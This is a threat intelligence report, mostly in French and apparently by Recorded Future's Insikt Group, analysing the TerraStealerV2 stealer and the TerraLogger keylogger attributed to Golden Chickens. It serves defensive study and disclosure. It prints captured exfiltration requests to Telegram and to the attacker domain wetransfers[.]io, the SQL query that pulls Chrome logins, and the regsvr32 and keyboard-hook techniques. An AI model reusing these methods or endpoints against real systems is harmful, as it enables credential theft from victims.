TerraStealerV2 and TerraLogger: Golden Chickens' New Malware Families Discovered
Executive Summary
Insikt Group a identifié deux nouvelles familles de malwares, TerraStealerV2 et TerraLogger, associées à l’acteur de la menace à visée financière Golden Chickens (également connu sous le nom de Venom Spider). Golden Chickens est connu pour exploiter une plateforme de Malware-as-a-Service (MaaS) utilisée par des groupes de cybercriminels tels que FIN 6, Cobalt Group et Evilnum. Les nouvelles familles, observées entre janvier et avril 2025, semblent être en cours de développement avec pour objectif le vol d’identifiants et l’enregistrement de frappe (keylogging).
TerraStealerV2 est conçu pour collecter des identifiants de navigateur, des données de portefeuilles de cryptomonnaies et des informations sur les extensions de navigateur. Bien qu’il cible la base de données « Login Data » de Chrome pour voler des identifiants, il ne contourne pas les protections Application Bound Encryption (ABE) introduites dans les mises à jour de Chrome après juillet 2024, ce qui indique que le code du malware est obsolète ou toujours en cours de développement. Les données sont exfiltrées vers Telegram et le domaine wetransfers[.]io. Le stealer a été observé au cours de sa distribution sous plusieurs formats, notamment des fichiers LNK, MSI, DLL et EXE, et exploite des utilitaires Windows de confiance comme regsvr32.exe et mshta.exe pour échapper à la détection.
TerraLogger, en revanche, est un enregistreur de frappe autonome. Il utilise un hook de clavier courant de bas niveau pour enregistrer les frappes et écrit les journaux dans des fichiers locaux. Cependant, il n’inclut aucune fonctionnalité d’exfiltration de données ni de communication de commande et de contrôle (C2), ce qui indique qu’il est soit en cours de développement, soit destiné à constituer un élément modulaire de l’écosystème MaaS de Golden Chickens.
L’état actuel de TerraStealerV2 et de TerraLogger suggère que ces deux outils sont toujours en cours de développement actif et n’ont pas encore atteint le niveau de furtivité généralement associé aux outils matures de Golden Chickens. Étant donné l’historique de Golden Chickens dans le développement de malwares conçus pour le vol d’identifiants et les opérations d’accès, il est probable que ces capacités continueront d’évoluer. Il est conseillé aux entreprises de suivre les recommandations d’atténuation fournies dans ce rapport pour réduire le risque de compromission à mesure que ces familles de malwares arrivent à maturité.
Key Findings
- Insikt Group a identifié deux nouvelles familles de malwares, TerraStealerV2 et TerraLogger, attribuées à l’acteur de la menace Golden Chickens. TerraStealerV2 peut dérober les identifiants de navigateur et cibler les portefeuilles de cryptomonnaies, tandis que TerraLogger fonctionne uniquement comme un module de keylogger autonome.
- TerraLogger est la première utilisation d’une capacité d’enregistrement de frappe observée dans un malware développé par Golden Chickens.
- TerraStealerV2 n’est pas encore capable de déchiffrer les identifiants protégés par Chrome ABE, ce qui indique que l’outil est probablement obsolète ou encore en cours de développement.
- Insikt Group a observé dix échantillons distincts de distribution de TerraStealerV2 entre janvier et mars 2025, pour lesquels diverses méthodes de diffusion ont été employées, dont des fichiers MSI, DLL et LNK.
Background
Golden Chickens, également connu sous le pseudonyme Venom Spider, est un acteur malveillant motivé par l'appât du gain, réputé pour exploiter une suite de logiciels malveillants furtifs et modulaires selon un modèle MaaS. Depuis au moins 2018, la suite Golden Chickens MaaS est déployée dans le cadre de campagnes visant des organisations de grande valeur par le biais de vecteurs d'ingénierie sociale, en particulier des campagnes de spearphishing utilisant de fausses offres d'emploi ou de faux CV. Il est à noter que ce logiciel malveillant est utilisé par des groupes cybercriminels de premier plan, notamment FIN6 et Cobalt Group, basés en Russie, ainsi que Evilnum, basé en Biélorussie, qui a causé des dommages estimés à plus de 1,5 milliard de dollars américains à l'échelle mondiale.
Les composants principaux de la suite MaaS Golden Chickens sont VenomLNK et TerraLoader. Les infections initiales sont généralement l’œuvre de VenomLNK, un fichier de raccourcis Windows malveillant qui exécute TerraLoader, un module de chargement à l’origine du déploiement d’autres malwares Golden Chickens. Ces modules comprennent TerraStealer pour la collecte d’identifiants, TerraTV pour le détournement de TeamViewer, et TerraCrypt pour le déploiement de ransomwares. Parmi les autres familles de malwares attribuées à l’écosystème Golden Chickens, on trouve TerraRecon pour la reconnaissance, TerraWiper pour l’effacement des données et lite_more_eggs, comme illustré dans la figure 1 ci-dessous.
Les efforts d'attribution menés par l'unité de réponse aux menaces d'eSentire ont permis de relier Golden Chickens à un acteur malveillant connu sous le nom de badbullzvenom, un personnage qui serait géré conjointement par des individus basés en Moldavie et à Montréal, au Canada. L'historique de développement de l'acteur malveillant montre une progression, passant du statut de simple participant à un forum de bas niveau à celui de fournisseur MaaS bien établi. Les outils développés par Golden Chickens ont été utilisés dans plusieurs campagnes, notamment lors d'attaques très médiatisées contre British Airways, Newegg et Ticketmaster UK.
Entre août et octobre 2024, Zscaler ThreatLabz a observé une recrudescence de l'activité attribuée à Golden Chickens, impliquant le déploiement de deux nouvelles familles de logiciels malveillants : RevC2 et Venom Loader. Ces outils ont été diffusés via des campagnes VenomLNK, exploitant des techniques d'ingénierie sociale telles que des demandes de paiement en cryptomonnaie et de la documentation sur des API logicielles. La figure 2 illustre la chaîne d'attaque utilisée pour diffuser RevC2.
Bien que le vecteur de livraison initial soit inconnu, la séquence d'infection commence par l'exécution d'un fichier VenomLNK. Ce fichier télécharge une image leurre correspondant au thème de l'appât (dans ce cas, la documentation de l'API logicielle) et lance l'exécution de RevC2. Plus précisément, le fichier LNK utilise wmic.exe pour invoquer regsvr32.exe. qui charge une charge utile OCX malveillante hébergée sur un partage réseau distant.
Analyse technique
Insikt Group a identifié deux nouvelles familles de malwares attribuées au groupe d’acteurs de la menace Golden Chickens. La première, suivie sous le nom de TerraStealerV2, est un stealer ciblant principalement les identifiants de navigateur, les portefeuilles de cryptomonnaies et les extensions de navigateur. La deuxième, identifiée sous le nom de TerraLogger, est un keylogger observé comme un module autonome. Les sous-sections suivantes présentent une analyse technique détaillée de chaque famille de malwares.
TerraStealerV2
Insikt Group a récemment identifié un nouveau stealer attribué à Golden Chickens, téléchargé sur Recorded Future Malware Intelligence le 3 mars 2025. Un chemin d’accès à la base de données de programmes (PDB) intégré à l’échantillon (voir Figure 3) suggère que l’acteur de la menace désigne le malware sous le nom de NOK. Cependant, Insikt Group le suit sous le nom de TerraStealerV2.
Figure 3: Chaîne PDB TerraStealerV2 (Source : Recorded Future)
Le logiciel malveillant est conçu pour être distribué sous forme de fichier OCX et exécuté via regsvr32.exe. qui appelle la fonction d'exportation DllRegisterServer. Lors de son exécution, DllRegisterServer vérifie d'abord que le fichier fourni a une extension .ocx. extension et que le nom du fichier se termine par un caractère ou un chiffre spécifique codé en dur (par exemple, 0.ocx). Il vérifie ensuite que le fichier est bien exécuté par regsvr32.exe avant de continuer, comme illustré dans la figure 4 ci-dessous.
Le logiciel malveillant procède ensuite à la désobfuscation des chaînes à l'aide d'une routine de décodage XOR avec une clé codée en dur. Il collecte des informations de base sur l'hôte en appelant GetUserNameA et GetComputerNameA pour récupérer les noms d'utilisateur et de système locaux. Il détermine ensuite l'adresse IP de la victime en envoyant une requête HTTP à ifconfig[.]me. Les données collectées sont ensuite exfiltrées via la plateforme de messagerie Telegram vers une chaîne nommée « Noterdam » à l'aide d'un jeton bot associé à « NoterdanssBot », comme illustré à la figure 5.
POST /< redacted >/sendMessage?chat_id=-4652754121 HTTP/1.1
Host: api.telegram.org
Accept: */*
Content-Length: 24014
Content-Type: application/x-www-form-urlencoded
chat_id=-4652754121&text=%2A%2ANew%20User%20Ran%20the%20Application%2A%2A%0A%2A%2AUsername%3A%2A%2A%20Admin%0A%2A%2APC%20Name%3A%2A%2A%20UUHJKMQK%0A%2A%2AIP%20Address%3A%2A%2A%20%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-style-type%22%20content%3D%22text%2Fcss%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-script-type%22%20content%3D%22text%2Fjavascript%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-language%22%20content%3D%22en%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22pragma%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22cache-control%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22description%22%20content%3D%22Get%20my%20IP%20Address%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22keywords%22%20content%3D%22ip%20address%20ifconfig%20ifconfig.me%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22author%22%20content%3D%22%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22favicon.ico%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22canonical%22%20href%3D%22https%3A%2F%2Fifconfig.me%2F%22%20%2F%3E%0A%20%20%20%20%3Ctitle%3EWhat%20Is%20My%20IP%20Address%3F%20-%20ifconfig.me%3C%2Ftitle%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20href%3D%22.%2Fstatic%2Fstyles%2Fstyle.css%22%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%3E%0A%20%20%20%20%3Clink%20href%3D%22https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffa
Figure 5: TerraStealerV2 exfiltrant des données initiales vers Telegram (Source : Recorded Future)
Le décodage des données POST du message révèle que l’acteur de la menace envoie une notification structurée à un canal Telegram. La notification, comme illustré à la figure 6, inclut une alerte indiquant qu’un nouvel utilisateur a exécuté l’application, le nom d’utilisateur et le nom du système collectés, ainsi que la réponse HTML brute de la requête ifconfig[.]me.
**Nouvel utilisateur ayant exécuté l'application**
**Nom d'utilisateur :** Admin
**Nom du PC :** UUHJKMQK
**Adresse IP :** <! DOCTYPE html>
< html lang="en">
<head>
< meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
< meta http-equiv="content-style-type" content="text/css" />
< meta http-equiv="content-script-type" content="text/javascript" />
< meta http-equiv="content-language" content="en" />
44pragma" content="no-cache" />
< meta http-equiv="cache-control" content="no-cache" />
< meta name="description" content="Obtenir mon adresse IP" />
Figure 6: Données décodées par URL exfiltrées vers Telegram (Source : Recorded Future)
Le logiciel malveillant énumère ensuite les processus actifs, à la recherche d'instances de chrome.exe ; Si un processus est détecté, il tente de le terminer à l'aide de l'API Windows TerminateProcess. Ce comportement vise probablement à libérer tout verrouillage des fichiers de la base de données du navigateur Chrome, afin de garantir un accès sans entrave pendant l'extraction des données. Ensuite, le logiciel malveillant tente d'extraire les identifiants enregistrés et d'autres données sensibles de Chrome, puis cible des portefeuilles de cryptomonnaies et des extensions de navigateur spécifiques.
Le vol de la base de données du navigateur Chrome consiste à copier la base de données "Login Data" vers C:ProgramData\Temp\LoginData, puis à extraire les identifiants enregistrés à l'aide d'une bibliothèque SQLite liée de manière statique afin d'exécuter la requête SQL SELECT origin_url, username_value, password_value FROM logins. TerraStealerV2 utilise SQLite version 3.46.0. qui est la même version liée statiquement dans RevC2, ce qui suggère une possible réutilisation du code ou des pratiques de développement partagé. Cependant, la mise en œuvre ne contourne pas l'ABE de Chrome, ce qui signifie que les mots de passe collectés ne seront pas déchiffrés pour les hôtes équipés de navigateurs Chrome mis à jour depuis le 24 juillet 2024. Cette limitation suggère que le code du voleur est obsolète ou encore en cours de développement, car les voleurs efficaces intègrent généralement des techniques de contournement ABE pour extraire les identifiants décryptés des versions modernes de Chrome ou Microsoft Edge.
Exfiltrated browser login data and informational messages are written to C:\ProgramData\file.txt and copied to %LOCALAPPDATA%\Packages\Bay0NsQIzx\p.txt when stealing operations have completed. If found, targeted browser extensions and wallets have their directories copied to %LOCALAPPDATA%\Packages\Bay0NsQIzx, and a Telegram message is sent indicating the number of crypto wallets found. The contents of %LOCALAPPDATA%\Packages\Bay0NsQIzx are subsequently compressed into an archive named output.zip, located in the same directory. The archive is then exfiltrated to the Telegram bot and a secondary C2 endpoint hosted at wetransfers[.]io/uplo.php, as shown in Figure 7. The domain wetransfers[.]io was registered on February 18, 2025, via NameCheap, Inc., and is currently hosted behind Cloudflare infrastructure.
POST /uplo.php HTTP/1.1
Host: wetransfers.io
Accept: */*
Content-Length: 11252
Content-Type: multipart/form-data; boundary=------------------------rUxSmqCNbtGx4auL8M41nl
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="zipFile"; filename="output.zip"
Type de contenu : application/octet-stream
PK........3.dZ...')...).......p.txt2025-03-04 21:33:38 - Total des navigateurs 2
PK..?.......3.dZ...')...).....................p.txtPK..........3...L.....
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="pcname"
UUHJKMQK
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="username"
Admin
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="totalwallets"
0
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="ip"
< ! DOCTYPE html>
< html lang="en">
<head>
< meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
< meta http-equiv="content-style-type" content="text/css" />
< meta http-equiv="content-script-type" content="text/javascript" />
< meta http-equiv="content-language" content="en" />
< meta http-equiv=pragma" content="no-cache" />
< meta http-equiv="cache-control" content="no-cache" />
< meta name="description" content="Obtenir mon adresse IP" />
< meta name="keywords" content="adresse IP ifconfig ifconfig.me" />
Figure 7: TerraStealerV2 exfiltrant des données vers wetransfers[.]io. (Source : Recorded Future)
Distribution
Insikt Group a identifié plusieurs mécanismes de diffusion utilisés pour la distribution de TerraStealerV2, notamment des fichiers exécutables (EXE), des bibliothèques de liens dynamiques (DLL), des packages Windows Installer (MSI) et des fichiers de raccourci (LNK). Dans tous les cas observés, la charge utile TerraStealerV2 OCX a été récupérée à partir de l'URL wetransfers[.]io/v.php. — une ressource hébergée sur le même domaine et exploitée pour l'exfiltration de données — à l'aide de curl ou de PowerShell, puis exécutée via regsvr32.exe (voir figure 8).
Le tableau 1 répertorie des échantillons de distribution, y compris leurs noms de fichiers, leurs horodatages de compilation et les charges utiles TerraStealerV2 correspondantes que Golden Chickens a été observé déployer. Un fichier LNK (SHA-256 : 9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a) semble se chevaucher avec le groupe d'activités suivi sous le nom ClickFix. Dans ce cas, le fichier LNK a déposé une charge utile se faisant passer pour un fichier MP4, qui a été exécutée via mshta.exe, une technique conforme aux tactiques précédemment observées dans les campagnes ClickFix.
Table 1: Échantillons utilisés pour distribuer TerraStealerV2 (Source : Recorded Future)
TerraLogger
Insikt Group a identifié un nouveau keylogger associé à Golden Chickens, transféré à Recorded Future Malware Intelligence le 13 janvier 2025. Insikt Group suit cette famille sous le nom de TerraLogger et a identifié cinq échantillons distincts. Quatre échantillons fonctionnent comme prévu et contiennent une chaîne PDB identique tel qu’illustré dans la figure 9 ci-dessous. L’échantillon restant n’inclut pas cette chaîne PDB et utilise le même chemin PDB que TerraStealerV2 (voir Figure 3 ci-dessus). Cette anomalie semble être un test de développeur utilisant la même méthode d’encodage de chaîne que TerraStealerV2. Cependant, elle échoue lors de l’exécution en raison d’un plantage pendant l’initialisation des chaînes liées au keylogger, ce qui empêche le malware d’atteindre son point d’entrée principal.
C:\Users\PC\Downloads\Projector\Projector\x64\Release\Projector.pdbFigure 9: Chaîne TerraLogger PDB (Source : Recorded Future)
TerraLogger est généralement fourni sous forme de fichier OCX et utilise les mêmes vérifications d'exécution initiale que TerraStealerV2. Il est destiné à être exécuté via regsvr32.exe. qui appelle la fonction d'exportation DllRegisterServer. Lors de son exécution, il vérifie d'abord que le fichier fourni a une extension .ocx. extension et que le nom du fichier se termine par un caractère ou un chiffre codé en dur (tel que 0.ocx). Il vérifie ensuite qu'il est bien exécuté par regsvr32.exe avant de continuer. Si les vérifications initiales d'exécution sont satisfaisantes, TerraLogger ouvre un descripteur de fichier pour enregistrer les frappes au clavier.
Insikt Group a identifié plusieurs chemins d'accès aux fichiers dans les cinq échantillons identifiés, avec des journaux enregistrés dans des fichiers tels que a.txt, f.txt, op.txt ou save.txt situés dans le dossier C:\ProgramData. Le logiciel malveillant implémente son enregistreur de frappe à l'aide d'une technique couramment observée, en installant un hook WH_KEYBOARD_LL à l'aide de SetWindowsHookExA, en enregistrant la fonction de rappel fn (illustrée à la figure 10) pour intercepter et traiter les événements de message, ce qui permet de capturer l'activité du clavier.
Les frappes sont enregistrées dans le fichier journal ouvert dans la fonction mw_log_key. Cette fonction récupère d'abord le titre de la fenêtre active, puis ajoute un séparateur de ligne suivi des frappes saisies. Il contient une logique permettant de gérer les caractères spéciaux, tels que les points-virgules, les crochets et les guillemets, et vérifie l'état de la touche Maj pour déterminer le caractère correct à enregistrer. <Si un code de touche ne correspond à aucune touche spéciale connue, il est écrit au format KEY-[code de touche]>. Un exemple de fichier journal généré est présenté à la figure 11.
Le tableau 2 répertorie les cinq échantillons de keyloggers TerraLogger identifiés et résume les différences entre les versions. Les horodatages de compilation indiquent que la première version a été créée le 13 janvier 2025 et que l'échantillon le plus récent a été compilé le 1er avril 2025. Ces échantillons reflètent des mises à jour mineures et progressives, ce qui suggère un développement actif. Les modifications notables incluent des changements au chemin d'accès utilisé pour stocker les journaux de frappes et une modification de la représentation des touches spéciales, qui sont désormais représentées par des abréviations en minuscules séparées par des barres verticales (par exemple, |bck|, |sft|) au lieu de balises angulaires en majuscules (par exemple, ).
Table 2: Comparaison des modifications apportées aux échantillons TerraLogger autonomes (Source : Recorded Future)
-
Pour lire l'intégralité de l'analyse, Click Here pour télécharger le rapport au format PDF.